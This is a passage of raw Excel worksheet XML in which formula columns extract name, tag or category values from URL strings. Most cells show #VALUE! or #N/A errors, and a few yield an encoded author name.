    <row r="2866" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2866" t="s">
        <v>2512</v>
      </c>
      <c r="B2866" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2866" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2866" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2866" t="e" cm="1">
        <f t="array" ref="E2866">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2866)), MID($A2866, FIND("name=",$A2866) + 5, LEN($A2866) - FIND("name=",$A2866)),
    ISNUMBER(FIND("tag/",$A2866)), MID($A2866, FIND("tag/",$A2866) + 4, LEN($A2866) - FIND("tag/",$A2866)),
    ISNUMBER(FIND("category",$A2866)), MID($A2866, FIND("category",$A2866) + 9, LEN($A2866) - FIND("category",$A2866)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2866" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2867" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2867" t="s">
        <v>2685</v>
      </c>
      <c r="B2867" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2867" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2867" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2867" t="e" cm="1">
        <f t="array" ref="E2867">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2867)), MID($A2867, FIND("name=",$A2867) + 5, LEN($A2867) - FIND("name=",$A2867)),
    ISNUMBER(FIND("tag/",$A2867)), MID($A2867, FIND("tag/",$A2867) + 4, LEN($A2867) - FIND("tag/",$A2867)),
    ISNUMBER(FIND("category",$A2867)), MID($A2867, FIND("category",$A2867) + 9, LEN($A2867) - FIND("category",$A2867)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2867" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2868" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2868" t="s">
        <v>2685</v>
      </c>
      <c r="B2868" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2868" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2868" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2868" t="e" cm="1">
        <f t="array" ref="E2868">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2868)), MID($A2868, FIND("name=",$A2868) + 5, LEN($A2868) - FIND("name=",$A2868)),
    ISNUMBER(FIND("tag/",$A2868)), MID($A2868, FIND("tag/",$A2868) + 4, LEN($A2868) - FIND("tag/",$A2868)),
    ISNUMBER(FIND("category",$A2868)), MID($A2868, FIND("category",$A2868) + 9, LEN($A2868) - FIND("category",$A2868)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2868" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2869" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2869" t="s">
        <v>2248</v>
      </c>
      <c r="B2869" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2869" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2869" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2869" t="e" cm="1">
        <f t="array" ref="E2869">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2869)), MID($A2869, FIND("name=",$A2869) + 5, LEN($A2869) - FIND("name=",$A2869)),
    ISNUMBER(FIND("tag/",$A2869)), MID($A2869, FIND("tag/",$A2869) + 4, LEN($A2869) - FIND("tag/",$A2869)),
    ISNUMBER(FIND("category",$A2869)), MID($A2869, FIND("category",$A2869) + 9, LEN($A2869) - FIND("category",$A2869)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2869" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2870" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2870" t="s">
        <v>2248</v>
      </c>
      <c r="B2870" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2870" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2870" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2870" t="e" cm="1">
        <f t="array" ref="E2870">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2870)), MID($A2870, FIND("name=",$A2870) + 5, LEN($A2870) - FIND("name=",$A2870)),
    ISNUMBER(FIND("tag/",$A2870)), MID($A2870, FIND("tag/",$A2870) + 4, LEN($A2870) - FIND("tag/",$A2870)),
    ISNUMBER(FIND("category",$A2870)), MID($A2870, FIND("category",$A2870) + 9, LEN($A2870) - FIND("category",$A2870)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2870" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2871" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2871" t="s">
        <v>2248</v>
      </c>
      <c r="B2871" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2871" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2871" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2871" t="e" cm="1">
        <f t="array" ref="E2871">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2871)), MID($A2871, FIND("name=",$A2871) + 5, LEN($A2871) - FIND("name=",$A2871)),
    ISNUMBER(FIND("tag/",$A2871)), MID($A2871, FIND("tag/",$A2871) + 4, LEN($A2871) - FIND("tag/",$A2871)),
    ISNUMBER(FIND("category",$A2871)), MID($A2871, FIND("category",$A2871) + 9, LEN($A2871) - FIND("category",$A2871)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2871" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2872" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2872" t="s">
        <v>2512</v>
      </c>
      <c r="B2872" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2872" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2872" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2872" t="e" cm="1">
        <f t="array" ref="E2872">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2872)), MID($A2872, FIND("name=",$A2872) + 5, LEN($A2872) - FIND("name=",$A2872)),
    ISNUMBER(FIND("tag/",$A2872)), MID($A2872, FIND("tag/",$A2872) + 4, LEN($A2872) - FIND("tag/",$A2872)),
    ISNUMBER(FIND("category",$A2872)), MID($A2872, FIND("category",$A2872) + 9, LEN($A2872) - FIND("category",$A2872)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2872" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2873" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2873" t="s">
        <v>2685</v>
      </c>
      <c r="B2873" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2873" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2873" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2873" t="e" cm="1">
        <f t="array" ref="E2873">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2873)), MID($A2873, FIND("name=",$A2873) + 5, LEN($A2873) - FIND("name=",$A2873)),
    ISNUMBER(FIND("tag/",$A2873)), MID($A2873, FIND("tag/",$A2873) + 4, LEN($A2873) - FIND("tag/",$A2873)),
    ISNUMBER(FIND("category",$A2873)), MID($A2873, FIND("category",$A2873) + 9, LEN($A2873) - FIND("category",$A2873)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2873" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2874" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2874" t="s">
        <v>2726</v>
      </c>
      <c r="B2874" t="str">
        <f t="shared" si="133"/>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="C2874" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2874" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2874" t="str" cm="1">
        <f t="array" ref="E2874">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2874)), MID($A2874, FIND("name=",$A2874) + 5, LEN($A2874) - FIND("name=",$A2874)),
    ISNUMBER(FIND("tag/",$A2874)), MID($A2874, FIND("tag/",$A2874) + 4, LEN($A2874) - FIND("tag/",$A2874)),
    ISNUMBER(FIND("category",$A2874)), MID($A2874, FIND("category",$A2874) + 9, LEN($A2874) - FIND("category",$A2874)))</f>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="F2874" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="2875" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2875" t="s">
        <v>2726</v>
      </c>
      <c r="B2875" t="str">
        <f t="shared" si="133"/>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="C2875" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2875" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2875" t="str" cm="1">
        <f t="array" ref="E2875">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2875)), MID($A2875, FIND("name=",$A2875) + 5, LEN($A2875) - FIND("name=",$A2875)),
    ISNUMBER(FIND("tag/",$A2875)), MID($A2875, FIND("tag/",$A2875) + 4, LEN($A2875) - FIND("tag/",$A2875)),
    ISNUMBER(FIND("category",$A2875)), MID($A2875, FIND("category",$A2875) + 9, LEN($A2875) - FIND("category",$A2875)))</f>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="F2875" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="2876" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2876" t="s">
        <v>2726</v>
      </c>
      <c r="B2876" t="str">
        <f t="shared" si="133"/>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="C2876" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2876" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2876" t="str" cm="1">
        <f t="array" ref="E2876">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2876)), MID($A2876, FIND("name=",$A2876) + 5, LEN($A2876) - FIND("name=",$A2876)),
    ISNUMBER(FIND("tag/",$A2876)), MID($A2876, FIND("tag/",$A2876) + 4, LEN($A2876) - FIND("tag/",$A2876)),
    ISNUMBER(FIND("category",$A2876)), MID($A2876, FIND("category",$A2876) + 9, LEN($A2876) - FIND("category",$A2876)))</f>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="F2876" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="2877" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2877" t="s">
        <v>2726</v>
      </c>
      <c r="B2877" t="str">
        <f t="shared" si="133"/>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="C2877" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2877" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2877" t="str" cm="1">
        <f t="array" ref="E2877">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2877)), MID($A2877, FIND("name=",$A2877) + 5, LEN($A2877) - FIND("name=",$A2877)),
    ISNUMBER(FIND("tag/",$A2877)), MID($A2877, FIND("tag/",$A2877) + 4, LEN($A2877) - FIND("tag/",$A2877)),
    ISNUMBER(FIND("category",$A2877)), MID($A2877, FIND("category",$A2877) + 9, LEN($A2877) - FIND("category",$A2877)))</f>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="F2877" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="2878" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2878" t="s">
        <v>2368</v>
      </c>
      <c r="B2878" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2878" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2878" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2878" t="e" cm="1">
        <f t="array" ref="E2878">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2878)), MID($A2878, FIND("name=",$A2878) + 5, LEN($A2878) - FIND("name=",$A2878)),
    ISNUMBER(FIND("tag/",$A2878)), MID($A2878, FIND("tag/",$A2878) + 4, LEN($A2878) - FIND("tag/",$A2878)),
    ISNUMBER(FIND("category",$A2878)), MID($A2878, FIND("category",$A2878) + 9, LEN($A2878) - FIND("category",$A2878)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2878" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2879" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2879" t="s">
        <v>2248</v>
      </c>
      <c r="B2879" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2879" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2879" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2879" t="e" cm="1">
        <f t="array" ref="E2879">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2879)), MID($A2879, FIND("name=",$A2879) + 5, LEN($A2879) - FIND("name=",$A2879)),
    ISNUMBER(FIND("tag/",$A2879)), MID($A2879, FIND("tag/",$A2879) + 4, LEN($A2879) - FIND("tag/",$A2879)),
    ISNUMBER(FIND("category",$A2879)), MID($A2879, FIND("category",$A2879) + 9, LEN($A2879) - FIND("category",$A2879)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2879" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2880" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2880" t="s">
        <v>2346</v>
      </c>
      <c r="B2880" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2880" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2880" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2880" t="e" cm="1">
        <f t="array" ref="E2880">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2880)), MID($A2880, FIND("name=",$A2880) + 5, LEN($A2880) - FIND("name=",$A2880)),
    ISNUMBER(FIND("tag/",$A2880)), MID($A2880, FIND("tag/",$A2880) + 4, LEN($A2880) - FIND("tag/",$A2880)),
    ISNUMBER(FIND("category",$A2880)), MID($A2880, FIND("category",$A2880) + 9, LEN($A2880) - FIND("category",$A2880)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2880" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2881" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2881" t="s">
        <v>2346</v>
      </c>
      <c r="B2881" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2881" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2881" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2881" t="e" cm="1">
        <f t="array" ref="E2881">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2881)), MID($A2881, FIND("name=",$A2881) + 5, LEN($A2881) - FIND("name=",$A2881)),
    ISNUMBER(FIND("tag/",$A2881)), MID($A2881, FIND("tag/",$A2881) + 4, LEN($A2881) - FIND("tag/",$A2881)),
    ISNUMBER(FIND("category",$A2881)), MID($A2881, FIND("category",$A2881) + 9, LEN($A2881) - FIND("category",$A2881)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2881" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2882" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2882" t="s">
        <v>2613</v>
      </c>
      <c r="B2882" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2882" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2882" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2882" t="e" cm="1">
        <f t="array" ref="E2882">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2882)), MID($A2882, FIND("name=",$A2882) + 5, LEN($A2882) - FIND("name=",$A2882)),
    ISNUMBER(FIND("tag/",$A2882)), MID($A2882, FIND("tag/",$A2882) + 4, LEN($A2882) - FIND("tag/",$A2882)),
    ISNUMBER(FIND("category",$A2882)), MID($A2882, FIND("category",$A2882) + 9, LEN($A2882) - FIND("category",$A2882)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2882" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2883" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2883" t="s">
        <v>2601</v>
      </c>
      <c r="B2883" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2883" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2883" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2883" t="e" cm="1">
        <f t="array" ref="E2883">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2883)), MID($A2883, FIND("name=",$A2883) + 5, LEN($A2883) - FIND("name=",$A2883)),
    ISNUMBER(FIND("tag/",$A2883)), MID($A2883, FIND("tag/",$A2883) + 4, LEN($A2883) - FIND("tag/",$A2883)),
    ISNUMBER(FIND("category",$A2883)), MID($A2883, FIND("category",$A2883) + 9, LEN($A2883) - FIND("category",$A2883)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2883" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2884" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2884" t="s">
        <v>2248</v>
      </c>
      <c r="B2884" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2884" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2884" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2884" t="e" cm="1">
        <f t="array" ref="E2884">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2884)), MID($A2884, FIND("name=",$A2884) + 5, LEN($A2884) - FIND("name=",$A2884)),
    ISNUMBER(FIND("tag/",$A2884)), MID($A2884, FIND("tag/",$A2884) + 4, LEN($A2884) - FIND("tag/",$A2884)),
    ISNUMBER(FIND("category",$A2884)), MID($A2884, FIND("category",$A2884) + 9, LEN($A2884) - FIND("category",$A2884)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2884" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2885" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2885" t="s">
        <v>2517</v>
      </c>
      <c r="B2885" t="e">
        <f t="shared" si="133"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2885" t="e">
        <f t="shared" si="134"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2885" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2885" t="e" cm="1">
        <f t="array" ref="E2885">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2885)), MID($A2885, FIND("name=",$A2885) + 5, LEN($A2885) - FIND("name=",$A2885)),
    ISNUMBER(FIND("tag/",$A2885)), MID($A2885, FIND("tag/",$A2885) + 4, LEN($A2885) - FIND("tag/",$A2885)),
    ISNUMBER(FIND("category",$A2885)), MID($A2885, FIND("category",$A2885) + 9, LEN($A2885) - FIND("category",$A2885)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2885" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2886" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2886" t="s">
        <v>2700</v>
      </c>
      <c r="B2886" t="e">
        <f t="shared" ref="B2886:B2949" si="136">IF(FIND("name=",A2886,1)&gt;0,MID(A2886,FIND("name=",A2886,1)+5,LEN(A2886)-FIND("name=",A2886,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C2886" t="e">
        <f t="shared" ref="C2886:C2949" si="137">IF(FIND("tag/",$A2886,1)&gt;0,MID($A2886,FIND("tag/",$A2886,1)+4,LEN($A2886)-FIND("tag/",$A2886,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D2886" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2886" t="e" cm="1">
        <f t="array" ref="E2886">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2886)), MID($A2886, FIND("name=",$A2886) + 5, LEN($A2886) - FIND("name=",$A2886)),
    ISNUMBER(FIND("tag/",$A2886)), MID($A2886, FIND("tag/",$A2886) + 4, LEN($A2886) - FIND("tag/",$A2886)),
    ISNUMBER(FIND("category",$A2886)), MID($A2886, FIND("category",$A2886) + 9, LEN($A2886) - FIND("category",$A2886)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2886" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2887" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2887" t="s">
        <v>2701</v>
      </c>
      <c r="B2887" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2887" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2887" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2887" t="e" cm="1">
        <f t="array" ref="E2887">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2887)), MID($A2887, FIND("name=",$A2887) + 5, LEN($A2887) - FIND("name=",$A2887)),
    ISNUMBER(FIND("tag/",$A2887)), MID($A2887, FIND("tag/",$A2887) + 4, LEN($A2887) - FIND("tag/",$A2887)),
    ISNUMBER(FIND("category",$A2887)), MID($A2887, FIND("category",$A2887) + 9, LEN($A2887) - FIND("category",$A2887)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2887" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2888" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2888" t="s">
        <v>2702</v>
      </c>
      <c r="B2888" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2888" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2888" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2888" t="e" cm="1">
        <f t="array" ref="E2888">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2888)), MID($A2888, FIND("name=",$A2888) + 5, LEN($A2888) - FIND("name=",$A2888)),
    ISNUMBER(FIND("tag/",$A2888)), MID($A2888, FIND("tag/",$A2888) + 4, LEN($A2888) - FIND("tag/",$A2888)),
    ISNUMBER(FIND("category",$A2888)), MID($A2888, FIND("category",$A2888) + 9, LEN($A2888) - FIND("category",$A2888)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2888" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2889" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2889" t="s">
        <v>2703</v>
      </c>
      <c r="B2889" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2889" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2889" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2889" t="e" cm="1">
        <f t="array" ref="E2889">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2889)), MID($A2889, FIND("name=",$A2889) + 5, LEN($A2889) - FIND("name=",$A2889)),
    ISNUMBER(FIND("tag/",$A2889)), MID($A2889, FIND("tag/",$A2889) + 4, LEN($A2889) - FIND("tag/",$A2889)),
    ISNUMBER(FIND("category",$A2889)), MID($A2889, FIND("category",$A2889) + 9, LEN($A2889) - FIND("category",$A2889)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2889" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2890" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2890" t="s">
        <v>2704</v>
      </c>
      <c r="B2890" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2890" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2890" t="e">
        <f t="shared" si="135"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2890" t="e" cm="1">
        <f t="array" ref="E2890">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2890)), MID($A2890, FIND("name=",$A2890) + 5, LEN($A2890) - FIND("name=",$A2890)),
    ISNUMBER(FIND("tag/",$A2890)), MID($A2890, FIND("tag/",$A2890) + 4, LEN($A2890) - FIND("tag/",$A2890)),
    ISNUMBER(FIND("category",$A2890)), MID($A2890, FIND("category",$A2890) + 9, LEN($A2890) - FIND("category",$A2890)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2890" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2891" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2891" t="s">
        <v>2705</v>
      </c>
      <c r="B2891" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2891" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2891" t="e">
        <f t="shared" ref="D2891:D2954" si="138">IF(FIND("category",$A2891,1)&gt;0,MID($A2891,FIND("category",$A2891,1)+9,LEN($A2891)-FIND("category",$A2891,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E2891" t="e" cm="1">
        <f t="array" ref="E2891">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2891)), MID($A2891, FIND("name=",$A2891) + 5, LEN($A2891) - FIND("name=",$A2891)),
    ISNUMBER(FIND("tag/",$A2891)), MID($A2891, FIND("tag/",$A2891) + 4, LEN($A2891) - FIND("tag/",$A2891)),
    ISNUMBER(FIND("category",$A2891)), MID($A2891, FIND("category",$A2891) + 9, LEN($A2891) - FIND("category",$A2891)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2891" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2892" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2892" t="s">
        <v>2706</v>
      </c>
      <c r="B2892" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2892" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2892" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2892" t="e" cm="1">
        <f t="array" ref="E2892">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2892)), MID($A2892, FIND("name=",$A2892) + 5, LEN($A2892) - FIND("name=",$A2892)),
    ISNUMBER(FIND("tag/",$A2892)), MID($A2892, FIND("tag/",$A2892) + 4, LEN($A2892) - FIND("tag/",$A2892)),
    ISNUMBER(FIND("category",$A2892)), MID($A2892, FIND("category",$A2892) + 9, LEN($A2892) - FIND("category",$A2892)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2892" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2893" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2893" t="s">
        <v>2377</v>
      </c>
      <c r="B2893" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2893" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2893" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2893" t="e" cm="1">
        <f t="array" ref="E2893">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2893)), MID($A2893, FIND("name=",$A2893) + 5, LEN($A2893) - FIND("name=",$A2893)),
    ISNUMBER(FIND("tag/",$A2893)), MID($A2893, FIND("tag/",$A2893) + 4, LEN($A2893) - FIND("tag/",$A2893)),
    ISNUMBER(FIND("category",$A2893)), MID($A2893, FIND("category",$A2893) + 9, LEN($A2893) - FIND("category",$A2893)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2893" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2894" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2894" t="s">
        <v>2816</v>
      </c>
      <c r="B2894" t="e">
        <f t="shared" si="136"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2894" t="e">
        <f t="shared" si="137"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2894" t="e">
        <f t="shared" si="138"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2894" t="e" cm="1">
        <f t="array" ref="E2894">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2894)), MID($A2894, FIND("name=",$A2894) + 5, LEN($A2894) - FIND("name=",$A2894)),
    ISNUMBER(FIND("tag/",$A2894)), MID($A2894, FIND("tag/",$A2894) + 4, LEN($A2894) - FIND("tag/",$A2894)),
    ISNUMBER(FIND("category",$A2894)), MID($A2894, FIND("category",$A2894) + 9, LEN($A2894) - FIND("category",$A2894)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2894" t="e">
